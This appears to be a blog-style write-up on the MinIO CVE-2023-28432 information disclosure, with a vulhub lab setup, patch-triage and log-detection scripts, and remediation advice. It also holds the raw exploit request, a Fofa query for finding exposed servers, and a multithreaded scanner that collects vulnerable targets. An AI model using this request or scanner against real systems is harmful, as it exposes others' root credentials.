MinIO cluster-mode information disclosure vulnerability CVE-2023-28432

1. Vulnerability description & environment setup

MinIO is an open-source object storage system.

In versions before RELEASE.2023-03-20T20-16-18Z (exclusive), a deployment in cluster mode has an information disclosure vulnerability: by sending a single POST request an attacker can obtain every environment variable of the process, and those include the credentials MINIO_SECRET_KEY / MINIO_ROOT_PASSWORD.

Environment setup

Download the vulhub project, switch to the CVE-2023-28432 directory and run:

docker-compose up -d

Once the cluster is up, http://localhost:9001 serves the web management console and http://localhost:9000 is the API service.

2. Reproducing the vulnerability

Affected range: MinIO RELEASE.2019-12-17T23-16-33Z <= MinIO version < MinIO RELEASE.2023-03-20T20-16-18Z
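The affected range above is a comparison of MinIO release tags, which encode a UTC build timestamp, so "is this node affected?" reduces to parsing the tag and comparing timestamps against the two bounds quoted in the advisory. The following is an added example, not code from the original post or from MinIO itself: it parses such tags, applies the inclusive lower / exclusive upper bound, and triages a host inventory. The hostnames and release tags in SAMPLE_INVENTORY are constructed for the example (not checked against the real MinIO release history), and the function names are mine.

```python
from datetime import datetime

# Bounds quoted in the write-up: affected if
#   RELEASE.2019-12-17T23-16-33Z <= version < RELEASE.2023-03-20T20-16-18Z
FIRST_AFFECTED = "RELEASE.2019-12-17T23-16-33Z"
FIXED_RELEASE = "RELEASE.2023-03-20T20-16-18Z"

# Constructed sample inventory for the example: {hostname: release tag}
SAMPLE_INVENTORY = {
    "minio-a.example.internal": "RELEASE.2023-03-13T19-46-17Z",  # inside the range
    "minio-b.example.internal": "RELEASE.2023-03-20T20-16-18Z",  # the fixed release itself
    "minio-c.example.internal": "RELEASE.2019-12-17T23-16-33Z",  # first affected (inclusive)
    "minio-d.example.internal": "RELEASE.2019-12-12T16-45-56Z",  # older than the range
}


def parse_release(tag):
    """Turn a tag of the form RELEASE.YYYY-MM-DDTHH-MM-SSZ into a datetime.

    Anything else raises ValueError, so a malformed or unknown version string
    is never silently treated as 'not affected'."""
    prefix = "RELEASE."
    if not tag.startswith(prefix):
        raise ValueError("not a MinIO release tag: %r" % tag)
    return datetime.strptime(tag[len(prefix):], "%Y-%m-%dT%H-%M-%SZ")


def is_affected(tag):
    """True when the release falls inside the advisory's affected range."""
    version = parse_release(tag)
    return parse_release(FIRST_AFFECTED) <= version < parse_release(FIXED_RELEASE)


def triage(version_by_host):
    """Given {hostname: release tag}, return the hosts that still need the upgrade, sorted."""
    return sorted(host for host, tag in version_by_host.items() if is_affected(tag))


if __name__ == "__main__":
    for host in triage(SAMPLE_INVENTORY):
        print("needs upgrade: %s (%s)" % (host, SAMPLE_INVENTORY[host]))
```

Note that the boundary handling matters: the first affected tag is reported as affected, the fixed release is not, and a tag that does not parse raises instead of being skipped, which is the safer failure mode for a patch-status check.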

Fofa:banner="MinIO" || header="MinIO" || title="MinIO Browser"

The vulnerability lies in the API endpoint http://10.211.55.2:9000/minio/bootstrap/v1/verify; sending the following request returns the leaked environment variables:

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 10.211.55.2:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
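The request above is an unauthenticated, empty POST to the bootstrap verify endpoint, which in normal operation is only exchanged between the cluster's own nodes. That makes it a clean detection signal: a POST to that path from any source outside the cluster is worth an alert regardless of whether the node has been patched. The following detector is an added example, not code from the original post or from MinIO: the access-log format, the sample lines, the peer network and the function names are all assumptions made for the example, so adapt the regex to the log format your gateway or reverse proxy actually writes.

```python
import re
from ipaddress import ip_address, ip_network

VERIFY_PATH = "/minio/bootstrap/v1/verify"

# Constructed log format for this example, one request per line:
#   <iso-timestamp> <client-ip> "<METHOD> <path> <proto>" <status>
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})$'
)

# Assumed: the only hosts with a legitimate reason to call the bootstrap
# endpoint are the cluster's own nodes, which live in this network.
PEER_NETWORKS = ["10.0.0.0/24"]

# Constructed sample lines: the 10.0.0.12 call is a peer, the others are not
SAMPLE_LOG = [
    '2023-07-05T12:00:01Z 10.0.0.12 "POST /minio/bootstrap/v1/verify HTTP/1.1" 200',
    '2023-07-05T12:00:05Z 203.0.113.7 "POST /minio/bootstrap/v1/verify HTTP/1.1" 200',
    '2023-07-05T12:00:06Z 203.0.113.7 "GET /minio/health/live HTTP/1.1" 200',
    '2023-07-05T12:00:09Z 198.51.100.4 "POST /minio/bootstrap/v1/verify?x=1 HTTP/1.1" 403',
    'garbage line that does not match the format',
]


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def flag_verify_calls(lines, peer_networks):
    """Return (timestamp, ip, status) for each POST to the verify endpoint that
    came from outside the peer networks.

    A 200 from an outside source means the environment was most likely handed
    out; a non-200 is still a probe worth recording."""
    nets = [ip_network(n) for n in peer_networks]
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip lines the regex cannot parse rather than crash
        path = rec["path"].split("?", 1)[0]  # ignore any query string
        if rec["method"] != "POST" or path != VERIFY_PATH:
            continue
        try:
            src = ip_address(rec["ip"])
        except ValueError:
            continue  # not an IP literal; nothing to compare against
        if any(src in net for net in nets):
            continue  # a cluster node bootstrapping: expected traffic
        hits.append((rec["ts"], rec["ip"], int(rec["status"])))
    return hits


if __name__ == "__main__":
    for ts, ip, status in flag_verify_calls(SAMPLE_LOG, PEER_NETWORKS):
        print("ALERT %s: bootstrap verify POST from %s (status %d)" % (ts, ip, status))
```

The allowlist is deliberately by source network rather than by status code: after the upgrade the endpoint stops leaking, but an outside host calling it at all still tells you someone is scanning for this bug, and a 200 hit on an unpatched node is the cue to rotate MINIO_ROOT_USER / MINIO_ROOT_PASSWORD, not just to patch.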

As can be seen, the response contains MINIO_ROOT_USER (accessKey) and MINIO_ROOT_PASSWORD (secretKey). With these credentials one can log in to the management console:

MINIO_ROOT_USER minioadmin

MINIO_ROOT_PASSWORD minioadmin-vulhub

You can of course also test with a script:

import random
import urllib3
import requests
from argparse import ArgumentParser
from concurrent.futures import ThreadPoolExecutor
from time import time
from urllib import parse
# app="minio"

# Suppress the warning emitted for every request made with verify=False
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
url_list = []


def get_ua():
  """Build a random Chrome-like User-Agent string."""
  first_num = random.randint(55, 62)
  third_num = random.randint(0, 3200)
  fourth_num = random.randint(0, 140)
  os_type = [
    '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
    '(Macintosh; Intel Mac OS X 10_12_6)'
  ]
  chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
  ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
          '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'])
  return ua


# Defined but not passed to requests.post(); add proxies=proxies there to
# route the traffic through a local intercepting proxy.
proxies = {'http': 'http://127.0.0.1:8080',
           'https': 'https://127.0.0.1:8080'}


def write_targets(vurl, filename):
  """Append a confirmed-vulnerable URL to the results file."""
  with open(filename, "a+") as f:
    f.write(vurl + "\n")


# poc
def check_url(url):
  """Send the empty POST to /minio/bootstrap/v1/verify and report whether
  the response looks like a leaked environment dump."""
  parsed = parse.urlparse(url)
  url = parsed.scheme + '://' + parsed.netloc
  vulnurl = url + "/minio/bootstrap/v1/verify"
  headers = {
    'User-Agent': get_ua(),
    "Host": parsed.netloc,  # netloc keeps the port, so non-default ports get a correct Host header
    "Content-Type": "application/x-www-form-urlencoded"
  }
  data = ""
  try:
    res = requests.post(vulnurl, verify=False, allow_redirects=False, headers=headers, data=data, timeout=5)
    if res.status_code == 200 and "MinioEn" in res.text:
      # print(res.text)
      print("\033[32m[+]{} is vulnerable\033[0m".format(url))
      write_targets(vulnurl, "vuln.txt")
    else:
      print("\033[34m[-]{} not vulnerable.\033[0m".format(url))
  except Exception:
    print("\033[34m[!]{} request false.\033[0m".format(url))


# multithreading: the original used the third-party `threadpool` package;
# the standard-library ThreadPoolExecutor does the same job without a dependency
def multithreading(url_list, pools=5):
  with ThreadPoolExecutor(max_workers=pools) as pool:
    pool.map(check_url, url_list)


if __name__ == '__main__':
  arg = ArgumentParser(description='check_url By m2')
  arg.add_argument("-u", "--url", help="Target URL; Example:http://ip:port")
  arg.add_argument("-f", "--file", help="Target URL; Example:url.txt")
  args = arg.parse_args()
  url = args.url
  filename = args.file
  print("[+]任务开始.....")
  start = time()
  if url is not None and filename is None:
    check_url(url)
  elif url is None and filename is not None:
    with open(filename) as f:
      for line in f:
        line = line.strip()
        if line:
          url_list.append(line)
    multithreading(url_list, 10)
  else:
    arg.print_help()
  end = time()
  print('任务完成,用时%ds.' % (end - start))

3. Remediation

Check your deployment against the affected versions listed above and upgrade to a fixed version, or consult the official upgrade guidance via the reference links.

Posted 2023-07-05 20:23 by Arrest